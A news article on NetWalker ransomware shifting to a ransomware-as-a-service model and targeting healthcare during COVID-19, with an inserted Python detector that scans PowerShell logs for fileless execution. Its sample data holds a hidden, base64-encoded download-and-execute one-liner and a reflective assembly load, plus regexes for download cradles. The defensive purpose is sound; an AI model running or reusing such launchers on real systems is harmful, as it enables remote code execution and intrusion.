
NetWalker Ransomware Expands Operations, Targeting Healthcare

NetWalker ransomware actors have exploited the healthcare sector throughout the COVID-19 crisis. Now, the hackers are pairing up with other cybercriminals to gain enterprise access.


By Jessica Davis

The NetWalker ransomware threat actors – a serious threat to the healthcare sector – have ramped up their business model, transitioning to a Ransomware-as-a-Service (RaaS) model in an attempt to partner with other seasoned cybercriminals, according to a recent Advanced Intelligence report.

The healthcare sector has been a prime target for NetWalker through the pandemic. The hacking group was behind the ransomware attack on the website of Champaign-Urbana Public Health District in Illinois in mid-March.

In March, Microsoft detailed some of its tactics alongside those of other human-operated ransomware groups, such as Maze and REvil. These groups all rely on similar techniques, such as credential theft and lateral movement, before later deploying a ransomware payload.

In the last two months, as the impact of the pandemic increased, NetWalker has become “extremely active.” Its new business model will allow the group to collaborate with other cybercriminals who have already gained access to large networks and have the capability of disseminating ransomware.

Members of the hacking group began posting advertisements for a “ransomware affiliate program” on March 19. NetWalker appears to be looking for groups that “prioritize quality, not quantity.” The researchers noted this preference is vastly different from typical Russian-based ransomware operations, which commonly rely on brute-force attacks and mass production.

To gain further interest, NetWalker shared some of its victim-focused material, such as IP addresses, administrator access, and network-attached storage access, among other key elements. A month later, the group refreshed its advertisement asking for experienced hackers in an effort to create “an exclusive group of top-tier network intruders to execute its new RaaS business model.”

Trend Micro researchers recently reported that NetWalker is now also leveraging fileless ransomware, written in PowerShell and executed directly in memory without the malware ever being written to disk. As a result, these attacks allow the hackers to maintain persistence and evade detection more easily by abusing legitimate system tools.
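Because a fileless PowerShell payload never lands on disk, file-based antivirus has nothing to scan; the practical detection point is PowerShell script block logging (Event ID 4104), which records the script text as it executes, including the decoded form of an encoded command. The following is an added example, not code from the article or from Trend Micro or Advanced Intelligence, that runs a handful of generic in-memory-execution indicators over constructed sample log records. The indicator names, weights, threshold and sample scripts are all assumptions chosen for illustration; none are NetWalker-specific signatures.

```python
"""Flag PowerShell script block log records that show the in-memory,
fileless execution pattern described in the article (added example)."""
import base64
import re

# Indicator name -> regex. Generic, widely documented PowerShell tradecraft
# markers (assumed for this example, not NetWalker-specific signatures).
RULES = {
    "encoded_command": re.compile(
        r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "reflective_load": re.compile(
        r"\[(?:system\.)?reflection\.assembly\]::load", re.I),
}

# Weights are an assumption: an encoded command alone is common in benign
# automation, so by itself it stays below the alert threshold.
WEIGHTS = {"encoded_command": 1, "hidden_window": 1, "download_cradle": 2,
           "in_memory_exec": 2, "reflective_load": 3}
ALERT_THRESHOLD = 3

# Constructed sample records shaped like 4104 ScriptBlockText entries.
# Record 2 wraps a download-and-execute one-liner in -EncodedCommand the way
# the launcher would; the URL is a placeholder on the reserved .invalid TLD.
_INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
SAMPLE_EVENTS = [
    {"id": 1, "script": r"Get-ChildItem C:\Users\alice\Documents | Measure-Object"},
    {"id": 2, "script": "powershell.exe -NoP -W Hidden -EncodedCommand "
                        + base64.b64encode(_INNER.encode("utf-16-le")).decode()},
    {"id": 3, "script": "[System.Reflection.Assembly]::Load($bytes); "
                        "$asm.EntryPoint.Invoke($null, $null)"},
    {"id": 4, "script": "Get-Service -Name Spooler | Restart-Service"},
]


def decode_encoded_command(script):
    """Return the UTF-16LE plaintext behind a -EncodedCommand blob, or None."""
    m = RULES["encoded_command"].search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def analyze(script):
    """Match every rule against the raw script block and, when an encoded
    command is present, against its decoded form as well."""
    decoded = decode_encoded_command(script)
    texts = [script] + ([decoded] if decoded else [])
    hits = {name for name, rx in RULES.items() if any(rx.search(t) for t in texts)}
    score = sum(WEIGHTS[name] for name in hits)
    return {"indicators": sorted(hits), "score": score, "decoded": decoded}


def scan_events(events, threshold=ALERT_THRESHOLD):
    """Return (event id, indicators) for every record at or above threshold."""
    flagged = []
    for ev in events:
        result = analyze(ev["script"])
        if result["score"] >= threshold:
            flagged.append((ev["id"], result["indicators"]))
    return flagged


if __name__ == "__main__":
    for event_id, indicators in scan_events(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(indicators)}")
```

The decode step is what makes this useful against a fileless launcher: the outer command line shows only an opaque Base64 blob, and the download cradle and `IEX` only become visible once it is decoded, which is also why script block logging (which records the decoded text) is worth enabling alongside command-line auditing. In production the same rules would run over exported 4104 events rather than the constructed list, and the weights would be tuned against the organisation's own administrative scripts to keep false positives down.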

NetWalker is also actively leveraging the COVID-19 crisis for its phishing campaigns, targeting individuals interested in more information about the virus, as well as healthcare industry individuals and entities.

The hackers primarily distribute their ransomware through phishing schemes or spam emails, or through large-scale network infiltration. The group claims it first exfiltrates data from its victims and then posts it online: a model made notorious by the Maze hacking group.

Further, the group will typically demand a significant ransom from its victims, from hundreds of thousands to millions of dollars. Researchers explained that NetWalker is rapidly evolving and highly credible as a threat, especially to the healthcare sector during the COVID-19 crisis, and that more attacks and updates from the group are likely in the coming weeks.

“NetWalker now claims a singular preference for network infiltration, which is novel to the Russian-speaking ransomware community,” researchers explained. “As a result, the threat actor is requiring its new affiliates to have pre-existing access to large networks.”

“NetWalker poses a significant threat, as it has been carrying out these high-profile attacks while simultaneously posting on the top-tier Russian-language DarkWeb forums in order to expand its operations and capabilities,” they added.

As ransomware attacks on healthcare providers rose 350 percent during Q4 2019, healthcare organizations should review key ransomware resources, paying particular attention to human-operated methods, including insights from Check Point, Microsoft, the FBI, the NSA, the Office for Civil Rights, and other security leaders.